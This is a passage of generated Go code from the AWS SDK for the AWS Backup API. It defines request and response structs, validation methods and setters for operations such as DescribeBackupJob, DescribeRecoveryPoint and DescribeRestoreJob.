RecoveryPointArn *string `location:"uri" locationName:"recoveryPointArn" type:"string" required:"true"`
}
// String returns the string representation
func (s DeleteRecoveryPointInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteRecoveryPointInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DeleteRecoveryPointInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DeleteRecoveryPointInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if s.RecoveryPointArn == nil {
invalidParams.Add(request.NewErrParamRequired("RecoveryPointArn"))
}
if s.RecoveryPointArn != nil && len(*s.RecoveryPointArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("RecoveryPointArn", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DeleteRecoveryPointInput) SetBackupVaultName(v string) *DeleteRecoveryPointInput {
s.BackupVaultName = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *DeleteRecoveryPointInput) SetRecoveryPointArn(v string) *DeleteRecoveryPointInput {
s.RecoveryPointArn = &v
return s
}
type DeleteRecoveryPointOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s DeleteRecoveryPointOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteRecoveryPointOutput) GoString() string {
return s.String()
}
// A dependent AWS service or resource returned an error to the AWS Backup service,
// and the action cannot be completed.
type DependencyFailureException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s DependencyFailureException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DependencyFailureException) GoString() string {
return s.String()
}
func newErrorDependencyFailureException(v protocol.ResponseMetadata) error {
return &DependencyFailureException{
RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *DependencyFailureException) Code() string {
return "DependencyFailureException"
}
// Message returns the exception's message.
func (s *DependencyFailureException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *DependencyFailureException) OrigErr() error {
return nil
}
func (s *DependencyFailureException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// Status code returns the HTTP status code for the request's response error.
func (s *DependencyFailureException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for request.
func (s *DependencyFailureException) RequestID() string {
return s.RespMetadata.RequestID
}
type DescribeBackupJobInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a request to AWS Backup to back up a resource.
//
// BackupJobId is a required field
BackupJobId *string `location:"uri" locationName:"backupJobId" type:"string" required:"true"`
}
// String returns the string representation
func (s DescribeBackupJobInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeBackupJobInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DescribeBackupJobInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DescribeBackupJobInput"}
if s.BackupJobId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupJobId"))
}
if s.BackupJobId != nil && len(*s.BackupJobId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupJobId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupJobId sets the BackupJobId field's value.
func (s *DescribeBackupJobInput) SetBackupJobId(v string) *DescribeBackupJobInput {
s.BackupJobId = &v
return s
}
type DescribeBackupJobOutput struct {
_ struct{} `type:"structure"`
// Returns the account ID that owns the backup job.
AccountId *string `type:"string"`
// Uniquely identifies a request to AWS Backup to back up a resource.
BackupJobId *string `type:"string"`
// Represents the options specified as part of backup plan or on-demand backup
// job.
BackupOptions map[string]*string `type:"map"`
// The size, in bytes, of a backup.
BackupSizeInBytes *int64 `type:"long"`
// Represents the actual backup type selected for a backup job. For example,
// if a successful WindowsVSS backup was taken, BackupType returns "WindowsVSS".
// If BackupType is empty, then the backup type that was is a regular backup.
BackupType *string `type:"string"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup vault; for
// example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
BackupVaultName *string `type:"string"`
// The size in bytes transferred to a backup vault at the time that the job
// status was queried.
BytesTransferred *int64 `type:"long"`
// The date and time that a job to create a backup job is completed, in Unix
// format and Coordinated Universal Time (UTC). The value of CompletionDate
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
CompletionDate *time.Time `type:"timestamp"`
// Contains identifying information about the creation of a backup job, including
// the BackupPlanArn, BackupPlanId, BackupPlanVersion, and BackupRuleId of the
// backup plan that is used to create it.
CreatedBy *RecoveryPointCreator `type:"structure"`
// The date and time that a backup job is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// The date and time that a job to back up resources is expected to be completed,
// in Unix format and Coordinated Universal Time (UTC). The value of ExpectedCompletionDate
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
ExpectedCompletionDate *time.Time `type:"timestamp"`
// Specifies the IAM role ARN used to create the target recovery point; for
// example, arn:aws:iam::123456789012:role/S3Access.
IamRoleArn *string `type:"string"`
// Contains an estimated percentage that is complete of a job at the time the
// job status was queried.
PercentDone *string `type:"string"`
// An ARN that uniquely identifies a recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
// An ARN that uniquely identifies a saved resource. The format of the ARN depends
// on the resource type.
ResourceArn *string `type:"string"`
// The type of AWS resource to be backed up; for example, an Amazon Elastic
// Block Store (Amazon EBS) volume or an Amazon Relational Database Service
// (Amazon RDS) database.
ResourceType *string `type:"string"`
// Specifies the time in Unix format and Coordinated Universal Time (UTC) when
// a backup job must be started before it is canceled. The value is calculated
// by adding the start window to the scheduled time. So if the scheduled time
// were 6:00 PM and the start window is 2 hours, the StartBy time would be 8:00
// PM on the date specified. The value of StartBy is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
StartBy *time.Time `type:"timestamp"`
// The current state of a resource recovery point.
State *string `type:"string" enum:"JobState"`
// A detailed message explaining the status of the job to back up a resource.
StatusMessage *string `type:"string"`
}
// String returns the string representation
func (s DescribeBackupJobOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeBackupJobOutput) GoString() string {
return s.String()
}
// SetAccountId sets the AccountId field's value.
func (s *DescribeBackupJobOutput) SetAccountId(v string) *DescribeBackupJobOutput {
s.AccountId = &v
return s
}
// SetBackupJobId sets the BackupJobId field's value.
func (s *DescribeBackupJobOutput) SetBackupJobId(v string) *DescribeBackupJobOutput {
s.BackupJobId = &v
return s
}
// SetBackupOptions sets the BackupOptions field's value.
func (s *DescribeBackupJobOutput) SetBackupOptions(v map[string]*string) *DescribeBackupJobOutput {
s.BackupOptions = v
return s
}
// SetBackupSizeInBytes sets the BackupSizeInBytes field's value.
func (s *DescribeBackupJobOutput) SetBackupSizeInBytes(v int64) *DescribeBackupJobOutput {
s.BackupSizeInBytes = &v
return s
}
// SetBackupType sets the BackupType field's value.
func (s *DescribeBackupJobOutput) SetBackupType(v string) *DescribeBackupJobOutput {
s.BackupType = &v
return s
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *DescribeBackupJobOutput) SetBackupVaultArn(v string) *DescribeBackupJobOutput {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DescribeBackupJobOutput) SetBackupVaultName(v string) *DescribeBackupJobOutput {
s.BackupVaultName = &v
return s
}
// SetBytesTransferred sets the BytesTransferred field's value.
func (s *DescribeBackupJobOutput) SetBytesTransferred(v int64) *DescribeBackupJobOutput {
s.BytesTransferred = &v
return s
}
// SetCompletionDate sets the CompletionDate field's value.
func (s *DescribeBackupJobOutput) SetCompletionDate(v time.Time) *DescribeBackupJobOutput {
s.CompletionDate = &v
return s
}
// SetCreatedBy sets the CreatedBy field's value.
func (s *DescribeBackupJobOutput) SetCreatedBy(v *RecoveryPointCreator) *DescribeBackupJobOutput {
s.CreatedBy = v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *DescribeBackupJobOutput) SetCreationDate(v time.Time) *DescribeBackupJobOutput {
s.CreationDate = &v
return s
}
// SetExpectedCompletionDate sets the ExpectedCompletionDate field's value.
func (s *DescribeBackupJobOutput) SetExpectedCompletionDate(v time.Time) *DescribeBackupJobOutput {
s.ExpectedCompletionDate = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *DescribeBackupJobOutput) SetIamRoleArn(v string) *DescribeBackupJobOutput {
s.IamRoleArn = &v
return s
}
// SetPercentDone sets the PercentDone field's value.
func (s *DescribeBackupJobOutput) SetPercentDone(v string) *DescribeBackupJobOutput {
s.PercentDone = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *DescribeBackupJobOutput) SetRecoveryPointArn(v string) *DescribeBackupJobOutput {
s.RecoveryPointArn = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *DescribeBackupJobOutput) SetResourceArn(v string) *DescribeBackupJobOutput {
s.ResourceArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *DescribeBackupJobOutput) SetResourceType(v string) *DescribeBackupJobOutput {
s.ResourceType = &v
return s
}
// SetStartBy sets the StartBy field's value.
func (s *DescribeBackupJobOutput) SetStartBy(v time.Time) *DescribeBackupJobOutput {
s.StartBy = &v
return s
}
// SetState sets the State field's value.
func (s *DescribeBackupJobOutput) SetState(v string) *DescribeBackupJobOutput {
s.State = &v
return s
}
// SetStatusMessage sets the StatusMessage field's value.
func (s *DescribeBackupJobOutput) SetStatusMessage(v string) *DescribeBackupJobOutput {
s.StatusMessage = &v
return s
}
type DescribeBackupVaultInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
}
// String returns the string representation
func (s DescribeBackupVaultInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeBackupVaultInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DescribeBackupVaultInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DescribeBackupVaultInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DescribeBackupVaultInput) SetBackupVaultName(v string) *DescribeBackupVaultInput {
s.BackupVaultName = &v
return s
}
type DescribeBackupVaultOutput struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup vault; for
// example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the Region where they are created. They consist of lowercase letters, numbers,
// and hyphens.
BackupVaultName *string `type:"string"`
// The date and time that a backup vault is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice.
CreatorRequestId *string `type:"string"`
// The server-side encryption key that is used to protect your backups; for
// example, arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab.
EncryptionKeyArn *string `type:"string"`
// The number of recovery points that are stored in a backup vault.
NumberOfRecoveryPoints *int64 `type:"long"`
}
// String returns the string representation
func (s DescribeBackupVaultOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeBackupVaultOutput) GoString() string {
return s.String()
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *DescribeBackupVaultOutput) SetBackupVaultArn(v string) *DescribeBackupVaultOutput {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DescribeBackupVaultOutput) SetBackupVaultName(v string) *DescribeBackupVaultOutput {
s.BackupVaultName = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *DescribeBackupVaultOutput) SetCreationDate(v time.Time) *DescribeBackupVaultOutput {
s.CreationDate = &v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *DescribeBackupVaultOutput) SetCreatorRequestId(v string) *DescribeBackupVaultOutput {
s.CreatorRequestId = &v
return s
}
// SetEncryptionKeyArn sets the EncryptionKeyArn field's value.
func (s *DescribeBackupVaultOutput) SetEncryptionKeyArn(v string) *DescribeBackupVaultOutput {
s.EncryptionKeyArn = &v
return s
}
// SetNumberOfRecoveryPoints sets the NumberOfRecoveryPoints field's value.
func (s *DescribeBackupVaultOutput) SetNumberOfRecoveryPoints(v int64) *DescribeBackupVaultOutput {
s.NumberOfRecoveryPoints = &v
return s
}
type DescribeCopyJobInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a copy job.
//
// CopyJobId is a required field
CopyJobId *string `location:"uri" locationName:"copyJobId" type:"string" required:"true"`
}
// String returns the string representation
func (s DescribeCopyJobInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeCopyJobInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DescribeCopyJobInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DescribeCopyJobInput"}
if s.CopyJobId == nil {
invalidParams.Add(request.NewErrParamRequired("CopyJobId"))
}
if s.CopyJobId != nil && len(*s.CopyJobId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("CopyJobId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetCopyJobId sets the CopyJobId field's value.
func (s *DescribeCopyJobInput) SetCopyJobId(v string) *DescribeCopyJobInput {
s.CopyJobId = &v
return s
}
type DescribeCopyJobOutput struct {
_ struct{} `type:"structure"`
// Contains detailed information about a copy job.
CopyJob *CopyJob `type:"structure"`
}
// String returns the string representation
func (s DescribeCopyJobOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeCopyJobOutput) GoString() string {
return s.String()
}
// SetCopyJob sets the CopyJob field's value.
func (s *DescribeCopyJobOutput) SetCopyJob(v *CopyJob) *DescribeCopyJobOutput {
s.CopyJob = v
return s
}
type DescribeGlobalSettingsInput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s DescribeGlobalSettingsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeGlobalSettingsInput) GoString() string {
return s.String()
}
type DescribeGlobalSettingsOutput struct {
_ struct{} `type:"structure"`
// A list of resources along with the opt-in preferences for the account.
GlobalSettings map[string]*string `type:"map"`
// The date and time that the global settings were last updated. This update
// is in Unix format and Coordinated Universal Time (UTC). The value of LastUpdateTime
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
LastUpdateTime *time.Time `type:"timestamp"`
}
// String returns the string representation
func (s DescribeGlobalSettingsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeGlobalSettingsOutput) GoString() string {
return s.String()
}
// SetGlobalSettings sets the GlobalSettings field's value.
func (s *DescribeGlobalSettingsOutput) SetGlobalSettings(v map[string]*string) *DescribeGlobalSettingsOutput {
s.GlobalSettings = v
return s
}
// SetLastUpdateTime sets the LastUpdateTime field's value.
func (s *DescribeGlobalSettingsOutput) SetLastUpdateTime(v time.Time) *DescribeGlobalSettingsOutput {
s.LastUpdateTime = &v
return s
}
type DescribeProtectedResourceInput struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a resource. The format
// of the ARN depends on the resource type.
//
// ResourceArn is a required field
ResourceArn *string `location:"uri" locationName:"resourceArn" type:"string" required:"true"`
}
// String returns the string representation
func (s DescribeProtectedResourceInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeProtectedResourceInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DescribeProtectedResourceInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DescribeProtectedResourceInput"}
if s.ResourceArn == nil {
invalidParams.Add(request.NewErrParamRequired("ResourceArn"))
}
if s.ResourceArn != nil && len(*s.ResourceArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("ResourceArn", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetResourceArn sets the ResourceArn field's value.
func (s *DescribeProtectedResourceInput) SetResourceArn(v string) *DescribeProtectedResourceInput {
s.ResourceArn = &v
return s
}
type DescribeProtectedResourceOutput struct {
_ struct{} `type:"structure"`
// The date and time that a resource was last backed up, in Unix format and
// Coordinated Universal Time (UTC). The value of LastBackupTime is accurate
// to milliseconds. For example, the value 1516925490.087 represents Friday,
// January 26, 2018 12:11:30.087 AM.
LastBackupTime *time.Time `type:"timestamp"`
// An ARN that uniquely identifies a resource. The format of the ARN depends
// on the resource type.
ResourceArn *string `type:"string"`
// The type of AWS resource saved as a recovery point; for example, an EBS volume
// or an Amazon RDS database.
ResourceType *string `type:"string"`
}
// String returns the string representation
func (s DescribeProtectedResourceOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeProtectedResourceOutput) GoString() string {
return s.String()
}
// SetLastBackupTime sets the LastBackupTime field's value.
func (s *DescribeProtectedResourceOutput) SetLastBackupTime(v time.Time) *DescribeProtectedResourceOutput {
s.LastBackupTime = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *DescribeProtectedResourceOutput) SetResourceArn(v string) *DescribeProtectedResourceOutput {
s.ResourceArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *DescribeProtectedResourceOutput) SetResourceType(v string) *DescribeProtectedResourceOutput {
s.ResourceType = &v
return s
}
type DescribeRecoveryPointInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// An Amazon Resource Name (ARN) that uniquely identifies a recovery point;
// for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
//
// RecoveryPointArn is a required field
RecoveryPointArn *string `location:"uri" locationName:"recoveryPointArn" type:"string" required:"true"`
}
// String returns the string representation
func (s DescribeRecoveryPointInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeRecoveryPointInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DescribeRecoveryPointInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DescribeRecoveryPointInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if s.RecoveryPointArn == nil {
invalidParams.Add(request.NewErrParamRequired("RecoveryPointArn"))
}
if s.RecoveryPointArn != nil && len(*s.RecoveryPointArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("RecoveryPointArn", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DescribeRecoveryPointInput) SetBackupVaultName(v string) *DescribeRecoveryPointInput {
s.BackupVaultName = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *DescribeRecoveryPointInput) SetRecoveryPointArn(v string) *DescribeRecoveryPointInput {
s.RecoveryPointArn = &v
return s
}
type DescribeRecoveryPointOutput struct {
_ struct{} `type:"structure"`
// The size, in bytes, of a backup.
BackupSizeInBytes *int64 `type:"long"`
// An ARN that uniquely identifies a backup vault; for example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the Region where they are created. They consist of lowercase letters, numbers,
// and hyphens.
BackupVaultName *string `type:"string"`
// A CalculatedLifecycle object containing DeleteAt and MoveToColdStorageAt
// timestamps.
CalculatedLifecycle *CalculatedLifecycle `type:"structure"`
// The date and time that a job to create a recovery point is completed, in
// Unix format and Coordinated Universal Time (UTC). The value of CompletionDate
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
CompletionDate *time.Time `type:"timestamp"`
// Contains identifying information about the creation of a recovery point,
// including the BackupPlanArn, BackupPlanId, BackupPlanVersion, and BackupRuleId
// of the backup plan used to create it.
CreatedBy *RecoveryPointCreator `type:"structure"`
// The date and time that a recovery point is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// The server-side encryption key used to protect your backups; for example,
// arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab.
EncryptionKeyArn *string `type:"string"`
// Specifies the IAM role ARN used to create the target recovery point; for
// example, arn:aws:iam::123456789012:role/S3Access.
IamRoleArn *string `type:"string"`
// A Boolean value that is returned as TRUE if the specified recovery point
// is encrypted, or FALSE if the recovery point is not encrypted.
IsEncrypted *bool `type:"boolean"`
// The date and time that a recovery point was last restored, in Unix format
// and Coordinated Universal Time (UTC). The value of LastRestoreTime is accurate
// to milliseconds. For example, the value 1516925490.087 represents Friday,
// January 26, 2018 12:11:30.087 AM.
LastRestoreTime *time.Time `type:"timestamp"`
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup transitions and expires backups automatically
// according to the lifecycle that you define.
//
// Backups that are transitioned to cold storage must be stored in cold storage
// for a minimum of 90 days. Therefore, the “expire after days” setting
// must be 90 days greater than the “transition to cold after days” setting.
// The “transition to cold after days” setting cannot be changed after a
// backup has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
Lifecycle *Lifecycle `type:"structure"`
// An ARN that uniquely identifies a recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
// An ARN that uniquely identifies a saved resource. The format of the ARN depends
// on the resource type.
ResourceArn *string `type:"string"`
// The type of AWS resource to save as a recovery point; for example, an Amazon
// Elastic Block Store (Amazon EBS) volume or an Amazon Relational Database
// Service (Amazon RDS) database.
ResourceType *string `type:"string"`
// An Amazon Resource Name (ARN) that uniquely identifies the source vault where
// the resource was originally backed up in; for example, arn:aws:backup:us-east-1:123456789012:vault:BackupVault.
// If the recovery is restored to the same AWS account or Region, this value
// will be null.
SourceBackupVaultArn *string `type:"string"`
// A status code specifying the state of the recovery point.
//
// A partial status indicates that the recovery point was not successfully re-created
// and must be retried.
Status *string `type:"string" enum:"RecoveryPointStatus"`
// Specifies the storage class of the recovery point. Valid values are WARM
// or COLD.
StorageClass *string `type:"string" enum:"StorageClass"`
}
// String returns the string representation
func (s DescribeRecoveryPointOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeRecoveryPointOutput) GoString() string {
return s.String()
}
// SetBackupSizeInBytes sets the BackupSizeInBytes field's value.
func (s *DescribeRecoveryPointOutput) SetBackupSizeInBytes(v int64) *DescribeRecoveryPointOutput {
s.BackupSizeInBytes = &v
return s
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *DescribeRecoveryPointOutput) SetBackupVaultArn(v string) *DescribeRecoveryPointOutput {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DescribeRecoveryPointOutput) SetBackupVaultName(v string) *DescribeRecoveryPointOutput {
s.BackupVaultName = &v
return s
}
// SetCalculatedLifecycle sets the CalculatedLifecycle field's value.
func (s *DescribeRecoveryPointOutput) SetCalculatedLifecycle(v *CalculatedLifecycle) *DescribeRecoveryPointOutput {
s.CalculatedLifecycle = v
return s
}
// SetCompletionDate sets the CompletionDate field's value.
func (s *DescribeRecoveryPointOutput) SetCompletionDate(v time.Time) *DescribeRecoveryPointOutput {
s.CompletionDate = &v
return s
}
// SetCreatedBy sets the CreatedBy field's value.
func (s *DescribeRecoveryPointOutput) SetCreatedBy(v *RecoveryPointCreator) *DescribeRecoveryPointOutput {
s.CreatedBy = v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *DescribeRecoveryPointOutput) SetCreationDate(v time.Time) *DescribeRecoveryPointOutput {
s.CreationDate = &v
return s
}
// SetEncryptionKeyArn sets the EncryptionKeyArn field's value.
func (s *DescribeRecoveryPointOutput) SetEncryptionKeyArn(v string) *DescribeRecoveryPointOutput {
s.EncryptionKeyArn = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *DescribeRecoveryPointOutput) SetIamRoleArn(v string) *DescribeRecoveryPointOutput {
s.IamRoleArn = &v
return s
}
// SetIsEncrypted sets the IsEncrypted field's value.
func (s *DescribeRecoveryPointOutput) SetIsEncrypted(v bool) *DescribeRecoveryPointOutput {
s.IsEncrypted = &v
return s
}
// SetLastRestoreTime sets the LastRestoreTime field's value.
func (s *DescribeRecoveryPointOutput) SetLastRestoreTime(v time.Time) *DescribeRecoveryPointOutput {
s.LastRestoreTime = &v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *DescribeRecoveryPointOutput) SetLifecycle(v *Lifecycle) *DescribeRecoveryPointOutput {
s.Lifecycle = v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *DescribeRecoveryPointOutput) SetRecoveryPointArn(v string) *DescribeRecoveryPointOutput {
s.RecoveryPointArn = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *DescribeRecoveryPointOutput) SetResourceArn(v string) *DescribeRecoveryPointOutput {
s.ResourceArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *DescribeRecoveryPointOutput) SetResourceType(v string) *DescribeRecoveryPointOutput {
s.ResourceType = &v
return s
}
// SetSourceBackupVaultArn sets the SourceBackupVaultArn field's value.
func (s *DescribeRecoveryPointOutput) SetSourceBackupVaultArn(v string) *DescribeRecoveryPointOutput {
s.SourceBackupVaultArn = &v
return s
}
// SetStatus sets the Status field's value.
func (s *DescribeRecoveryPointOutput) SetStatus(v string) *DescribeRecoveryPointOutput {
s.Status = &v
return s
}
// SetStorageClass sets the StorageClass field's value.
func (s *DescribeRecoveryPointOutput) SetStorageClass(v string) *DescribeRecoveryPointOutput {
s.StorageClass = &v
return s
}
type DescribeRegionSettingsInput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s DescribeRegionSettingsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeRegionSettingsInput) GoString() string {
return s.String()
}
type DescribeRegionSettingsOutput struct {
_ struct{} `type:"structure"`
// Returns a list of all services along with the opt-in preferences in the Region.
ResourceTypeOptInPreference map[string]*bool `type:"map"`
}
// String returns the string representation
func (s DescribeRegionSettingsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeRegionSettingsOutput) GoString() string {
return s.String()
}
// SetResourceTypeOptInPreference sets the ResourceTypeOptInPreference field's value.
func (s *DescribeRegionSettingsOutput) SetResourceTypeOptInPreference(v map[string]*bool) *DescribeRegionSettingsOutput {
s.ResourceTypeOptInPreference = v
return s
}
type DescribeRestoreJobInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies the job that restores a recovery point.
//
// RestoreJobId is a required field
RestoreJobId *string `location:"uri" locationName:"restoreJobId" type:"string" required:"true"`
}
// String returns the string representation
func (s DescribeRestoreJobInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeRestoreJobInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DescribeRestoreJobInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DescribeRestoreJobInput"}
if s.RestoreJobId == nil {
invalidParams.Add(request.NewErrParamRequired("RestoreJobId"))
}
if s.RestoreJobId != nil && len(*s.RestoreJobId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("RestoreJobId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
